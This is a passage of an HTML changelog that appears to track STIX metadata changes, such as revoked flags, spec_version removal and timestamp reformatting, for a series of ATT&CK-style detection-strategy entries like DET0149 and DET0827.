black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.693000+00:00</td></tr></tbody></table></details><hr><h4>[DET0149] Detection of Exfiltration Over Unencrypted Non-C2 Protocol</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.687000+00:00</td></tr></tbody></table></details><hr><h4>[DET0827] Detection of Exploits</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.691000+00:00</td></tr></tbody></table></details><hr><h4>[DET0894] Detection of Exploits</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0416] Detection of File Transfer Protocol-Based C2 (FTP, FTPS, SMB, TFTP)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0818] Detection of Firmware</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0826] Detection of Gather Victim Host Information</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.688000+00:00</td></tr></tbody></table></details><hr><h4>[DET0841] Detection of Gather Victim Identity Information</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.689000+00:00</td></tr></tbody></table></details><hr><h4>[DET0869] Detection of Gather Victim Network Information</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.684000+00:00</td></tr></tbody></table></details><hr><h4>[DET0890] Detection of Gather Victim Org Information</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.693000+00:00</td></tr></tbody></table></details><hr><h4>[DET0916] Detection of Generate Content</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23T14:53:10.855Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 14:53:10.855000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:23:47.970Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.390000+00:00</td></tr></tbody></table></details><hr><h4>[DET0305] Detection of Group Policy Modifications via AD Object Changes and File Activity</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.682000+00:00</td></tr></tbody></table></details><hr><h4>[DET0887] Detection of Hardware</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0815] Detection of IP Addresses</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.678000+00:00</td></tr></tbody></table></details><hr><h4>[DET0849] Detection of Identify Business Tempo</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0807] Detection of Identify Roles</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.678000+00:00</td></tr></tbody></table></details><hr><h4>[DET0840] Detection of Install Digital Certificate</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: 